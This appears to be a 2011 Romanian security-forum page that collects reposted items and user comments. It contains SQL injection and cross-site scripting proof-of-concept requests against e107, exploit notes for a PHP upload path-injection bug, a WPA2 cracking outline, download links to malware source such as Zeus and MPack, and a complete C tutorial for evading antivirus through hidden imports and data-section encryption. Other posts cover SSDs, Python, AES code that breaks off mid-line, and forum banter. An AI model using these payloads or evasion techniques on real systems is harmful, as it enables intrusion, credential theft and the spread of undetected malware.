Nytro

File path injection in PHP ? 5.3.6 file upload (CVE 2011-2202) Saturday, June 18, 2011 Since the thing went public before new PHP version has been released, I present full details of the latest PHP vulnerability I reported - together with some sweet demo exploit. The issue was found with fuzzing being part of my recent file upload research. And I still have some more to show in the future My thanks go to Pawe? Gole? who helped analyze the vulnerability. The PHP Part The whole issue is tracked as PHP bug #54939, but the website is now down. The exemplary exploit is at pastebin. The nature of the bug is simple. PHP claims to remove the path component from HTTP file upload forms (transferred as MIME multipart/form-data requests), leaving only the file name given by the user agent. This is both for security, and to fix MSIE incompatibility (IE used to send full path like this: c:\WINDOWS\WHATEVER\My_file.txt). However, in 2008 PHP developers made a off-by-one error, and, as a result, if a name starts with \ or / and has no other (back)slashes, it's left as-is. So, this allows for: /vmlinuz /autorun.inf (/ will map to C:\ in WINDOWS - the drive where your PHP is run from) /boot.ini and other interesting file "names" to pass through. The application part Of course, what this means is simply that $_FILES[$input_field_name]['name'] will contain unsanitized file path - and that's not enough to complete an exploit. PHP script would need to use that filename as a destination for file writing. Unfortunately, at least a few applications do. I've found some pretty interesting examples. Among them is this AjaxFileUpload plugin. There are more applications with the same approach - just go on looking! AjaxFileUpload simply passes the given file "name" to move_uploaded_file(), which would try to create/overwrite a file in a root directory... The set up part And that will most likely fail, because of insufficient permissions. Who on Earth would allow PHP to write to root? Well, default Apache installation on Windows systems is run as a SYSTEM user (a.k.a root). Also, for some shared hostings PHP is run in a chroot-ed environment, and / is the document root of a website (which allows for an easy site defacement). It's tricky, I agree, that's why this bug is v. difficult to exploit in the wild (luckily). But it's possible! Today's Heroes: WAMP server, newest version (PHP 5.3.5), default install PHP <= 5.3.6, (5.3.5 in the demo) Windows XP AjaxFileUpload - A jQuery plugin that simulates asynchronous file uploads. In the exploit I simply show that (thanks to vulnerable set up) I can overwrite c:\boot.ini and make the system unbootable. There are more advanced scenarios that could be done (essentially I can supply a boot record file to use on next boot), but it's not my area of expertise. To upload a file, the HTML5 arbitrary file upload technique was used. So, patch your PHPs and bye! Sursa si video demonstrativ: http://blog.kotowicz.net/2011/06/file-path-injection-in-php-536-file.html

e107 0.7.25 Cross Site Scripting / SQL Injection Cred ca inca e destul de folosit... Vulnerability ID: HTB23004 Reference: http://www.htbridge.ch/advisory/multiple_vulnerabilities_in_e107_1.html Product: e107 website system Vendor: e107 ( http://e107.org/ ) Vulnerable Version: 0.7.25 and probably prior Tested on: 0.7.25 Vendor Notification: 25 May 2011 Vulnerability Type: Multiple Vulnerabilities Risk level: Medium Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ ) Vulnerability Details: 1. SQL injection in e107 The vulnerability exists due to failure in the "/e107_admin/users_extended.php" script to properly sanitize user-supplied input in "user_field" variable. "magic_quotes" must be set to "off". Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database. Attacker can use browser to exploit this vulnerability. The following PoC code is available: POST /e107_admin/users_extended.php?cat= HTTP/1.1 Host: HOST Cookie: <valid session cookies> Content-Type: application/x-www-form-urlencoded Content-Length: user_field=sss','',0, ','','', '0', '253','0','0','253','0','0'),('0',(select user()),'',0,'','','','0','253','0','0','253','0','0'),('0','dfg&user_applicable=253&user_read=0&user_write=253&add_category=Add+category 2. XSS in e107 User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the "/e107_admin/users_extended.php" script to properly sanitize user-supplied input in "user_include" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. The following PoC code is available:: poc.html <script> setTimeout("document.getElementById('f1').src='http://HOST/e107_admin/users_extended.php'",2000); </script> <iframe id=f1 src='form.html'></iframe> form.html <form method="POST" action="http://HOST/e107_admin/users_extended.php?editext" name=m> <input type="hidden" name="user_field" value="abcde1f1"> <input type="hidden" name="user_text" value="12121"> <input type="hidden" name="user_type" value="1"> <input type="hidden" name="user_include" value='"><script>alert(document.cookie)</script>'> <input type="hidden" name="add_field" value="1"> <input type="hidden" name="user_parent" value="0"> <input type="hidden" name="user_required" value="0"> <input type="hidden" name="user_applicable" value="255"> <input type="hidden" name="user_read" value="0"> <input type="hidden" name="user_write" value="253"> <input type="hidden" name="user_hide" value="0"> <input type=submit> </form> <script> document.m.submit(); </script> Sursa: e107 0.7.25 Cross Site Scripting / SQL Injection ? Packet Storm

Why SSDs are worth the money Here's a great, sweary presentation from Artur Bergman about the joy of using SSDs in your laptop and data-center, and how it's totally, absolutely worth the expense of replacing spinning drives with solid-state drives. I've been solid-state for more than a year, and I totally, absolutely agree. Video: http://www.boingboing.net/2011/06/17/why-ssds-are-worth-t.html

Learn Python The Hard Way, 2nd Edition This is the HTML preview of Learn Python The Hard Way, 2nd Edition. It is a work in progress and will most likely have some errors as I work on the full release of the 2nd Edition. The Hard Way Is Easier Exercise 0: The Setup Exercise 1: A Good First Program Exercise 2: Comments And Pound Characters Exercise 3: Numbers And Math Exercise 4: Variables And Names Exercise 5: More Variables And Printing Exercise 6: Strings And Text Exercise 7: More Printing Exercise 8: Printing, Printing Exercise 9: Printing, Printing, Printing Exercise 10: What Was That? Exercise 11: Asking Questions Exercise 12: Prompting People Exercise 13: Parameters, Unpacking, Variables Exercise 14: Prompting And Passing Exercise 15: Reading Files Exercise 16: Reading And Writing Files Exercise 17: More Files Exercise 18: Names, Variables, Code, Functions Exercise 19: Functions And Variables Exercise 20: Functions And Files Exercise 21: Functions Can Return Something Exercise 22: What Do You Know So Far? Exercise 23: Read Some Code Exercise 24: More Practice Exercise 25: Even More Practice Exercise 26: Congratulations, Take A Test! Exercise 27: Memorizing Logic Exercise 28: Boolean Practice Exercise 29: What If Exercise 30: Else And If Exercise 31: Making Decisions Exercise 32: Loops And Lists Exercise 33: While Loops Exercise 34: Accessing Elements Of Lists Exercise 35: Branches and Functions Exercise 36: Designing and Debugging Exercise 37: Symbol Review Exercise 38: Reading Code Exercise 39: Doing Things To Lists Exercise 40: Dictionaries, Oh Lovely Dictionaries Exercise 41: Gothons From Planet Percal #25 Exercise 42: Gothons Are Getting Classy Exercise 43: You Make A Game Exercise 44: Evaluating Your Game Exercise 45: Is-A, Has-A, Objects, and Classes Exercise 46: A Project Skeleton Exercise 47: Automated Testing Exercise 48: Advanced User Input Exercise 49: Making Sentences Exercise 50: Your First Website Exercise 51: Getting Input From A Browser Exercise 52: Testing The Web Application Next Steps Advice From An Old Programmer Indices and tables Index Module Index Search Page Online: http://learnpythonthehardway.org/book/

Cracking WPA2 Tutorial June 16th, 2011 | By: Andrew Whitaker| In this video we will demonstrate how to crack WPA2 using the Airmon-ng suite. We will do it by: Identifying an access point Capturing traffic from that access point Attempt to capture the handshake. We have two options for doing this. We can wait for a client to connect on their own We can run a deauth attack to force them to disconnect and then you can capture the handshake then . Once you have captured the handshake, you can attempt to crack it with a word list or a rainbow table. The key can then be found from there. Enjoy. Youtube: http://www.youtube.com/watch?v=pvjMJKUfAjo Sursa: Cracking WPA2 Tutorial | InfoSec Resources

Malware Sourcecode Mpack: http://www.secguru.com/files/MPack_Toolkit_v0.94.rar (pass: infected) Crimepack: MEGAUPLOAD - The leading online storage and file delivery service IncognitoRat: http://incognitorat.com/db/Files GhostRat: MEGAUPLOAD - The leading online storage and file delivery service Exe2Vbs: PURGATORY VIRUS TEAM - Exe2Vbs v1.6 Zeus: http://www.mdl4.com/files/zeus.rar (pass:zeus) Stuxnet: https://github.com/Laurelai/decompile-dump/zipball/master ZeroAccess/Max++(64Bit): http://resources.infosecinstitute.com/wp-content/uploads/Max++-downloader-install_2010.zip Posted by Satyam Pujari a.k.a Satyamhax Sursa: ::eSploit::: Malware Sourcecode

Aoleu, cred ca C++ este cel mai bine structura limbaj din perspectiva OOP. Poate doar C# il poate surclasa...

Am început cu programele mici in Visual Basic 6. Apoi am pus mana pe o carte de 900 de pagini (Visual Basic 6 - Manualul programatorului) si pe una de vreo 700 (Visual Basic 5 - 1001 de exemple, cam asa ceva) si am inteles limbajul. Cu testele pe diferite API-uri Windows, citind documentatia de pe MSDN pe care initial nu o citeam ci doar banuiam ce fac acele functii, am inceput sa inteleg perfect cum sta treaba. Si cotrobaiam prin multe coduri sursa de unde am invatat multe. Apoi am trecut pe PHP, am citit "Initiere in PHP 5" - Steve Holzner apoi "PHP 4 in imagini" si am invatat cam tot ce imi trebuia la inceput. HTML stiam deja partial, si din ce mai facusem la scoala... Iar MySQL din capitolele dedicate acestui SGBDR din cartile enumerate. Cu timpul am citit si documentatia multor functii de pe php.net si intreg capitolul dedicat PHP 5 - OOP, si multe alte lucruri de pe php.net. Si din coduri sursa am mai invatat cate ceva. Am trecut apoi si la o cartulie de JavaScript si vreau sa invat notiuni mai avansate de MySQL. C++ am invatat din liceu, dar nu mare lucru. Abia anul acesta m-am apucat serios de OOP (facultate) si e singura materie care mi-a placut si la care am inteles cam toate prostiile, cat de marunte, de la mostenire virtuala la RTTI. Am citit "C++ manual complet" - Herbert Schildt, "C++ pentru incepatori volumul II" - Liviu Negreanu, am retinut multe idei din "Secrete C++" - Constantin Galatean... Am citit si o carte despre Java si anume "Java de la 0 la expert" care mi s-a parut cea mai buna carte de programare citita, si o carte despre "Perl", dar nu m-au pasionat aceste limbaje si nu mai stiu mare lucru, nu prea le-am folosit. Pe Linux, shell scriping nu stiu cine stie ce, doar idile de baza, citite intr-un articol, doua si din citirea si modificarea diverselor fisiere de sistem. Eu nu pot citi carti pe calculator, nu suport, prefer formatul pe hartie. Si imi place sa citesc, citeam si literatura... In fine, asta e ideea mea de baza: invatati din carti! Una e sa iti explice cineva care lucreaza de ani de zile in domeniu, alta e sa iti explice Vasile de 12 ani care a inteles si el dintr-un tutorial ca daca pui "echo 'Plm';" apare pe site "Plm". Ca tot veni vorba: degeaba invatati un limbaj de programare daca nu lucrati des in el. Faceti proiecte! Cat mai multe si cat mai complexe. Va veti trezi ulterior ca vreti sa va angajati si... CV? Ce o sa treceti acolo? Conteaza proiectele foarte mult, cat de mici. Ca sugestie: faceti-va acum un CV. Si o sa vedeti ca nu prea aveti ce trece acolo. Da, puteti spune ca stiti n limbaje de programare, dar la interviuri se intreaba: - C: scrie in C o functie care inverseaza o lista simplu inlantuita - C++: se da un exemplu cu o functie virtuala si upcasting, sa spui daca codul e corect sau nu (daca vreti sa vedeti cate rahaturi pot sa apara in programe OOP in C++ postati aici si o sa vedeti ca nu e atat de usor sa fii un compilator uman) - PHP: se da o clasa, se serializeaza apoi se deserializeaza un obiect, cu __sleep si __wakeup de riguare. Ce se va afisa daca nu stiu ce... - PHP: se da o clasa abstracta, se mosteneste dar nu se implementeaza toate metodele bla bla... In fine, sunt foarte multe lucruri. Daca nu cititi o documentatie serioasa, gen CARTE nu aveti de unde sa le stiti. Sfatul meu: CITITI!

Nu e cine stie ce, trebuia sa fie bazat pe expresii regulate, asa ar fi fost de preferat. Oricum, nu are cum sa detecteze exact o vulnerabilitate, detecteaza partial cod potential vulnerabil. De exemplu, SQL Injection se gaseste la interogari, efectuate de exemplu cu mysql_query. Programul cauta dupa aceste apeluri.

S-a lansat Kaspersky Endpoint Security 8 for Linux Securitate | 17 Iunie 2011 Kaspersky Lab anun?? lansarea solu?iei business Kaspersky Endpoint Security 8 for Linux, care combin? toate func?ionalit??ile versiunii anterioare de Kaspersky Anti-Virus 5.7 for Linux cu cele ale Kaspersky Anti-Virus 5.5 for Samba. Administrarea produsului este realizat? prin intermediul unei interfe?e grafice intuitive, care este pe deplin compatibil? cu ecosistemele desktop Gnome ?i KDE. De asemenea, parametrii programului pot fi configura?i ?i din fereastra de comand? (command line). Kaspersky Endpoint Security 8 for Linux face parte din linia de solu?ii de securitate dedicate companiilor ?i poate fi integrat? în infrastructura de securitate a organiza?iei. Aceasta este compatibil? cu toate distribu?iile de Linux, atât pe 32, cât ?i pe 64 de bi?i. Kaspersky Endpoint Security 8 for Linux ofer? protec?ie complet? sta?iilor de lucru care opereaz? pe sisteme Linux, datorit? urm?toarelor inova?ii: • Solu?ia include noul motor antivirus – Kaspersky Anti-Virus Engine 8.0, un modul de analiz? euristic? ?i suport pentru dezinfectarea fi?ierelor stocate în arhive. • Kaspersky Endpoint Security 8 for Linux neutralizeaz? cu succes amenin??rile informatice care ?intesc sistemele de operare Linux, precum ?i pe cele care atac? platformele Windows ?i Mac OS X. Astfel, suita ofer? protec?ie complet? întregii re?ele a companiei, care include ?i sta?ii de lucru care nu opereaz? numai pe Linux. • Noul produs include consola Kaspersky Administration Kit 8.0, o interfa?? centralizat? de management care ofer? posibilitatea administr?rii de la distan??, vizualizarea de rapoarte ?i modificarea politicilor globale de securitate. „Kaspersky Endpoint Security 8 for Linux extinde oportunit??ile disponibile companiilor în termeni de securitate informatic? ?i permite acestora s? implementeze sisteme pentru protec?ia infrastructurii IT, indiferent de platformele de operare folosite pe sta?iile de lucru. Noua versiune a produsului ofer? protec?ie complet? computerelor cu Linux ?i include instrumentele necesare pentru configurarea, controlul ?i gestionarea politicilor centralizate de securitate”, a spus Teodor Cimpoe?u, Managing Director Kaspersky Lab România ?i Bulgaria. Sursa: S-a lansat Kaspersky Endpoint Security 8 for Linux | Agora.ro

Pentru cei care cauta vulnerabilitati in codul sursa e painea lui Dumnezeu.

Au strans 150.000 de "fani" pe twitter. Si i-au pus sa sune la un anumit numar. Apelurile erau redirectionate care Wow Call Center de exemplu. Si cica sunt "1337"... Ratati...

Eu am zis parerea mea in alt topic. Au fost niste atacuri la diverse site-uri, care erau deja revendicate de "x" si "y" apoi se trezesc ratatii astia si zic ca ei sunt "hackerii". La fel si cu pron.com de exemplu, cred ca mai intai a fost gasit de Tinko de al nostru apoi se trezesc ratatii astia sa zica ca ei l-au gasit. De fapt nici nu zic, doar ca se trezesc niste rahati imputiti din presa (muie presei) care ii promoveaza,

DDOS. Ratati. Tot e posibil sa nu fi avut nicio legatura. Script-kiddies. De exemplu au postat un nr. de telefon pe twiter, ratatii au sunat si redirectionau apelurile la diverse Call-Centers ale anumitor companii. Ce "1337"... Copii fara viitor.

Probabil: - Florin Salam - Am norocul scris in frunte :->

Ne ia 2 minute sa facem o asemenea pagina, de ce am plati pentru ea? Da, nu ai nimerit unde trebuie, nu gasesti aici clienti pentru asemenea porcarii.

JavaScript PDF Reader Interesanta idee... Download: https://github.com/andreasgal/pdf.js https://raw.github.com/andreasgal/pdf.js/master/pdf.js

The Art of the Cyberwar The development of new technologies, in catching up with military interests and dependence on existing technology by developed countries, sets up a scenario where the cyber war, or war in cyberspace, is becoming more important. All countries aware of the risks of such dependence developed defense programs against attacks that could jeopardize critical national infrastructure. On the other hand, developing countries and major world powers are training computer security experts in various techniques of hacking, cracking, virology, etc.., forming true experts in cyber warfare, called cyberwarriors. That does not fit anyone doubt that the future wars will not be determined or land or sea or air, but in cyberspace. The soldiers do not carry weapons or shields, but knowledge and deploy applications that war virus, disabling the enemy's critical systems that are technologically dependent. This is the scenario where the world is moving now, a scenario of technological dependence, where countries with more traditional military strength will be losing ability to war for countries with highly qualified in computer security and cyber techniques. This essay is intended as a point of reflection and knowledge about cyber warfare, on the present philosophy of Sun Tzu in the Art of War, and adapt their knowledge to technological scenario which we live and live, so we can get a modern compendium: The Art of Cyberwar. Download: http://www.malwareint.com/docs/the-art-of-the-cyberwar-en.pdf

Nu mai stiu exact ce si cum, dar vazusem cu mult inainte niste "atacuri" deja "semnate" de nu stiu cine pe care s-au gandit ei sa si le atribuie. Si au facut asta de multe ori. La fel cu Play Station, datele facute publice au aparut mai intai in alte locatii, apoi s-au trezit ei ca au spart ei site-urile celor de la Sony... Si acum tot isi atribuie ce se intampla pe mapamond. Sunt niste ratati.

LulzSec spun multe. Spun ca ei au "spart" tot ce s-a "spart" de multa vreme pana in prezent. Sunt niste ratati.

Clever tricks against antiviruses I bet you have come across some software you’ve made which you didn’t want the AV to pick up. This article explains how to import from DLLs without having to call GetProcAddress, and also how to encrypt your data section. Anti-viruses rely heavily on their heuristics, if all other (signature) scans fail. The patterns they search for in your executable, are the functions being imported, and the order they are being called. No imports! Having no import table is relatively easy. There are however some functions I haven’t imported dynamically, but which are very normal in any application (libc functions). The steps you need to do are: Get the kernel32 module base address. (kernel32.dll is always loaded when the process is started, and so is ntdll.dll) Make your own GetProcAddress Use it to find LoadLibrary’s address, so that you can load other DLLs Make the functions usable in a practical way, so that you don’t have to make a prototype for each of the functions that you will load 1. Get kernel32?s base address The first step is easy. There are lots of methods out there to retrieve the kernel32 base address, whose list of supported platforms varies greatly. I will be retrieving the address using the PEB (the linked list of the modules’ initialization order). Code: void __declspec(naked) *kernel_addr() { // Get kernel32 base address through PEB (initialization order) __asm { mov eax, fs:[0x30] // PEB address mov eax, [eax+0x0c] // PEB->Ldr mov eax, [eax+0x1c] // Ldr.InInitializationOrderModuleList (ntdll) mov eax, [eax] // [ntdll].Flink (kernel32) mov eax, [eax+0x08] // kernel32 base address ret } } You can use whichever method you want, really, as long as the end result is the kernel32 base address. 2. Our own GetProcAddress If you have ever had to deal with the PE format, you’d know that the exports have three main structures. These are the address table, the name table, and the ordinal table. The address table is simply just an array with RVAs to functions. There is one entry for every function exported. To get the real address, you add that RVA to the base address of the module. The name table, is another array with RVA’s to the names of the functions. The names are just strings of characters terminated by a null byte. The problem is, the names’ index doesn’t always correspond to the functions’ index. To retrieve the index, you use the ordinal table. The ordinal table is basically just an array with an index to the corresponding function. For example EAT[0] might be the function with the name ENT[42]. In this case, EOT[42] has the value of 0. So, the ordinal table is just another table, which maps a name to a function, using the name’s index to retrieve the function’s index. void *my_gpa(HMODULE modl, char *fname) { unsigned long modb = (unsigned long)modl; IMAGE_DOS_HEADER *dosh = (IMAGE_DOS_HEADER *)modb; IMAGE_NT_HEADERS *nth = (IMAGE_NT_HEADERS *)(modb+dosh->e_lfanew); IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(modb+nth->OptionalHeader.DataDirectory->VirtualAddress); unsigned int i; for(i = 0; i < ied->NumberOfNames; i++) { const char *nn = (*(const char **)(ied->AddressOfNames+modb+i*sizeof(void *)))+modb; if(!strcmp(fname, nn)) { unsigned short ordinal = *(unsigned short *)(ied->AddressOfNameOrdinals+modb+i*sizeof(unsigned short)); return (void *)((unsigned long)*(void **)(ied->AddressOfFunctions+modb+ordinal*sizeof(void *))+modb); } } return NULL; } In our code, modb is the base address of the module. Using that, we make our way to the export directory (ied), which contains the RVAs to the three tables we need. They are ied->AddressOfNames, ied->AddressOfFunctions and ied->AddressOfNameOrdinals. There’s some pointer arithmetic going on there, along with some type casting. Our function works just like GetProcAddress. It takes a module base address, and a function name, and returns a function address. We iterate through each entry in the name table. The string is retrieved through nn. (RVA of the table + base address + i*4)+base address – each entry in the table has the size of a word (32 bits = 4 bytes), so to get to the i’th entry, we add i*4. Once we’ve gotten to the i’th entry and dereferenced it, we add the base address to get the string’s address. If the name’s are the same, get the ordinal, the same way (except that one ordinal is the size of a short, 16 bits = 2 bytes). Then using the ordinal as an index, retrieve the address of the function and return it. 3. Getting LoadLibrary’s address Easiest step. The code speaks for itself: HMODULE (__stdcall *dyn_ll)(LPCTSTR lpFileName); dyn_ll = my_gpa(kern, "LoadLibraryA"); 4. Making it usable You will probably want to load lots of functions, not just one or two. Writing the prototypes for all of them would be tedious. Let’s make an array of functions for each module we will load, then let’s also make a function to load the APIs into these arrays. I have used kernel32, user32, and winsock. // don't forget to specify the correct calling convention char *fn_kernel[] = { "GetEnvironmentVariableA", // 0 "GetModuleFileNameA", // 1 "GetTickCount", // 2 "GetLocalTime", // 3 "CreateThread", // 4 "SetThreadPriority", // 5 }; unsigned long (__stdcall *func_kernel[sizeof(fn_kernel)/sizeof(*fn_kernel)])(); char *fn_user[] = { "MessageBoxA", // 0 "GetForegroundWindow", // 1 "GetWindowTextA", // 2 }; unsigned long (__stdcall *func_user[sizeof(fn_user)/sizeof(*fn_user)])(); char *fn_wsock[] = { "WSAStartup", // 0 "send", // 1 "connect", // 2 "socket", // 3 "gethostbyname", // 4 "closesocket", // 5 "recv", // 6 "WSACleanup", // 7 }; unsigned long (WSAAPI *func_wsock[sizeof(fn_wsock)/sizeof(*fn_wsock)])(); HMODULE (__stdcall *dyn_ll)(LPCTSTR lpFileName); void *my_gpa(HMODULE modl, char *fname) { unsigned long modb = (unsigned long)modl; IMAGE_DOS_HEADER *dosh = (IMAGE_DOS_HEADER *)modb; IMAGE_NT_HEADERS *nth = (IMAGE_NT_HEADERS *)(modb+dosh->e_lfanew); IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(modb+nth->OptionalHeader.DataDirectory->VirtualAddress); unsigned int i; for(i = 0; i < ied->NumberOfNames; i++) { const char *nn = (*(const char **)(ied->AddressOfNames+modb+i*sizeof(unsigned long)))+modb; if(!strcmp(fname, nn)) { unsigned short ordinal = *(unsigned short *)(ied->AddressOfNameOrdinals+modb+i*sizeof(unsigned short)); return (void *)((unsigned long)*(void **)(ied->AddressOfFunctions+modb+ordinal*sizeof(unsigned long))+modb); } } return NULL; } void load_imports() { HMODULE kern, user, wsock; unsigned long i; kern = kernel_addr(); dyn_ll = my_gpa(kern, "LoadLibraryA"); user = dyn_ll("user32.dll"); wsock = dyn_ll("ws2_32.dll"); for(i = 0; i < sizeof(fn_kernel)/sizeof(*fn_kernel); i++) func_kernel[i] = my_gpa(kern, fn_kernel[i]); for(i = 0; i < sizeof(fn_user)/sizeof(*fn_user); i++) func_user[i] = my_gpa(user, fn_user[i]); for(i = 0; i < sizeof(fn_wsock)/sizeof(*fn_wsock); i++) func_wsock[i] = my_gpa(wsock, fn_wsock[i]); } int main(int argc, char *argv[]) { WSADATA wsd; load_imports(); // MessageBoxA func_user[0](0, "MessageBoxA has been called!", "0wn3d.", MB_OK); func_wsock[0](MAKEWORD(1, 0), &wsd); // WSAStartup // evil stuff here func_wsock[7](); // WSACleanup return EXIT_SUCCESS; } Simple. Encrypting your data section This method is really easy, and of course it’s not nearly as good as the average packer, but it keeps AVs away from your strings. I have used the rc4 cipher, but any symmetric stream cipher would do. We need to encrypt it from another separate program, and have our program decrypt itself. Code for the encryption program: #include <windows.h> #include <imagehlp.h> #include <stdlib.h> #include <stdio.h> #define DATA ".data" // data section's name #define KEY "DqHAI5VN" // encryption key #define NEW 0x11c8 // new ep rva #define REP 0x5e4 // offset to patch with the old ep void rc4_ksched(unsigned char *key, unsigned long keylen, unsigned char sbox[0x100]) { unsigned long i, j; for(i = 0; i < 0x100; i++) sbox[i] = (unsigned char)i; for(j = i = 0; i < 0x100; i++) { unsigned char tmp; j = (j + sbox[i] + key[i % keylen]) & 0xff; tmp = sbox[i]; sbox[i] = sbox[j]; sbox[j] = tmp; } } void rc4(unsigned char sbox[0x100], unsigned char *src, unsigned char *dest, unsigned long len) { unsigned long i, j; i = j = 0; while(len--) { unsigned char tmp; i = (i + 1) & 0xff; j = (j + sbox[i]) & 0xff; tmp = sbox[i]; sbox[i] = sbox[j]; sbox[j] = tmp; *dest++ = *src++ ^ sbox[(sbox[i] + sbox[j]) % 0xff]; } } int main(int argc, char *argv) { FILE *f = fopen("evil.exe", "r+b"); IMAGE_DOS_HEADER dosh; IMAGE_NT_HEADERS nth; IMAGE_SECTION_HEADER sech, dummy; if(!f) return 1; memset(&dummy, 0, sizeof(dummy)); fread(&dosh, 1, sizeof(dosh), f); fseek(f, dosh.e_lfanew, SEEK_SET); fread(&nth, 1, sizeof(nth), f); fread(&sech, 1, sizeof(sech), f); while(memcmp(&sech, &dummy, sizeof(dummy))) { if(!strcmp(sech.Name, DATA)) { unsigned char sbox[0x100], *rd = malloc(sech.SizeOfRawData); DWORD ep, epaddr; rc4_ksched(KEY, 8, sbox); fseek(f, sech.PointerToRawData, SEEK_SET); fread(rd, 1, sech.SizeOfRawData, f); rc4(sbox, rd, rd, sech.SizeOfRawData); fseek(f, sech.PointerToRawData, SEEK_SET); fwrite(rd, 1, sech.SizeOfRawData, f); free(rd); epaddr = ((unsigned long)&nth.OptionalHeader.AddressOfEntryPoint-(unsigned long)&nth)+dosh.e_lfanew; fseek(f, epaddr, SEEK_SET); ep = NEW; fwrite(&ep, 1, 4, f); fseek(f, REP, SEEK_SET); ep = nth.OptionalHeader.AddressOfEntryPoint+nth.OptionalHeader.ImageBase; fwrite(&ep, 1, 4, f); fclose(f); return EXIT_SUCCESS; } fread(&sech, 1, sizeof(sech), f); } fclose(f); return EXIT_FAILURE; } What it does is that it searches for the data section, and when found, it reads it into memory, encrypts it, and writes it back. But to be able to decrypt it we must have some piece of code in our own executable, which will decrypt the data section using our key, and then jump back to the old entry point. void decrypt_data(unsigned long mod) { char data[6]; IMAGE_DOS_HEADER *dosh = (IMAGE_DOS_HEADER *)mod; IMAGE_SECTION_HEADER *sech = (IMAGE_SECTION_HEADER *)(mod+dosh->e_lfanew+sizeof(IMAGE_NT_HEADERS)); IMAGE_SECTION_HEADER dummy; data[0] = '.'; data[1] = 'd'; data[2] = 'a'; data[3] = 't'; data[4] = 'a'; data[5] = 0; memset(&dummy, 0, sizeof(dummy)); while(memcmp(sech, &dummy, sizeof(dummy))) { if(!strcmp(sech->Name, data)) { unsigned char sbox[0x100], key[9]; key[0] = 'D'; key[1] = 'q'; key[2] = 'H'; key[3] = 'A'; key[4] = 'I'; key[5] = '5'; key[6] = 'V'; key[7] = 'N'; key[8] = 0; rc4_ksched(key, 8, sbox); rc4(sbox, (unsigned char *)mod+sech->VirtualAddress, (unsigned char *)mod+sech->VirtualAddress, sech->SizeOfRawData); return; } sech++; } exit(EXIT_FAILURE); } void __declspec(naked) *gba() { __asm { mov eax, fs:[0x30] // PEB address mov eax, [eax+0x08] // PEB->BaseAddress ret } } void __declspec(naked) new_ep() { if(*(unsigned long *)magic != 'x86!') decrypt_data((unsigned long)gba()); __asm { push 0x41414141 // placeholder ret } } And in main: unsigned long nep_addr; int main(int argc, char *argv[]) { WSADATA wsd; nep_addr = (unsigned long)&new_ep; load_imports(); // MessageBoxA func_user[0](0, "MessageBoxA has been called!", "0wn3d.", MB_OK); func_wsock[0](MAKEWORD(1, 0), &wsd); // WSAStartup // evil stuff here func_wsock[7](); // WSACleanup return EXIT_SUCCESS; } We reference new_ep, because otherwise the optimizing compiler would notice that it is not called anywhere and would not generate code for it. Here you will have to get some offsets. First compile the executable, and disassemble it. Find the RVA of new_ep, and put it in the encryption program source code. Then find the offset of the placeholder for the old entry point. The instruction will look like push 0×41414141. Add one to the address of that instruction, subtract the image base from it, subtract the RVA of the .text section from it, add the offset of the .text section to it, and there you have your offset. Now put it in the encryption source, compile it, run it, and everything is ready Well, that was everything. If you found this article helpful or have a question, feel free to post a comment. Articolul mai elegant: http://www.x-n2o.com/clever-tricks-against-antiviruses/

AES Explained Hello people, It’s been a while since I have last posted an article. I decided to write an article about the Advanced Encryption Standard. I will explain certain concepts regarding AES and how it basically works. I will provide step by step C code, to make it even easier to understand. You can find the full source code at the end of this article. Actually many websites around the net provide source code for AES. This one is supposed to be easy to understand What is AES? AES is a cryptographic algorithm, more specifically a symmetric block cipher. This means that it operates at a block of data, instead of a single element per iteriation. (This element could be a bit or a byte). AES is also known as Rijndael. Actually AES is just a variant of Rijndael. To read more about AES/Rijndael see Advanced Encryption Standard - Wikipedia, the free encyclopedia. Especially the links at the bottom, they help understanding the basic structure of AES. AES is able to encrypt and decrypt a block of data using a key. The key and the block of data (from now on, the input) have a fixed length. The input is always 128-bit (16 bytes), while the key can be 128-bit, 192-bit or 256-bit (16, 24 and 32 bytes respectively). What makes AES so good you say? The answer would be it’s security and speed. It’s obviously secure since it’s been chosen by NIST. Then again, no one has been able to break it. And finally, it’s fast because it’s arithmetic is based on XOR operations and bit shifts, which CPUs like a lot. That said, it’s also simple and even faster to implement in hardware. AES Concepts Before I begin talking about the cipher itself, there are some very important concepts that I need to explain. They’re basically the math behind AES. Everything else is easy. This is actually the hardest part. Why am I explaining the hardest part before the everything else? Because if you don’t understand this, you won’t be able to understand the rest of this article. Of course, if you just want the source code, skip to the end. The content below may refer to the specification, which is located here: http://csrc.nist.gov/publications/fips/fips197/fips-197.pdf Articolul frumos aranjat: http://www.x-n2o.com/aes-explained/

[C] AES Implementation Author: X-N2O I joined all the source inside the code tags. If you wanna use it you have the separate files aes.c, aes.h and main.c inside the zip file. Enjoy. // AES Implementation by X-N2O // Started: 15:41:35 - 18 Nov 2009 // Finished: 20:03:59 - 21 Nov 2009 // Logarithm, S-Box, and RCON tables are not hardcoded // Instead they are generated when the program starts // All of the code below is based from the AES specification // You can find it at <a href="http://csrc.nist.gov/publications/fips/fips197/fips-197.pdf" class="bbc_url" title="External link" rel="nofollow external">http://csrc.nist.gov...97/fips-197.pdf</a> // You may use this code as you wish, but do not remove this comment // This is only a proof of concept, and should not be considered as the most efficient implementation #include <stdlib.h> #include <string.h> #include <stdio.h> #define AES_RPOL 0x011b // reduction polynomial (x^8 + x^4 + x^3 + x + 1) #define AES_GEN 0x03 // gf(2^8) generator (x + 1) #define AES_SBOX_CC 0x63 // S-Box C constant #define KEY_128 (128/8) #define KEY_192 (192/8) #define KEY_256 (256/8) #define aes_mul(a, ((a)&&(?g_aes_ilogt[(g_aes_logt[(a)]+g_aes_logt[(])%0xff]:0) #define aes_inv(a) ((a)?g_aes_ilogt[0xff-g_aes_logt[(a)]]:0) unsigned char g_aes_logt[256], g_aes_ilogt[256]; unsigned char g_aes_sbox[256], g_aes_isbox[256]; typedef struct { unsigned char state[4][4]; int kcol; size_t rounds; unsigned long keysched[0]; } aes_ctx_t; void aes_init(); aes_ctx_t *aes_alloc_ctx(unsigned char *key, size_t keyLen); inline unsigned long aes_subword(unsigned long w); inline unsigned long aes_rotword(unsigned 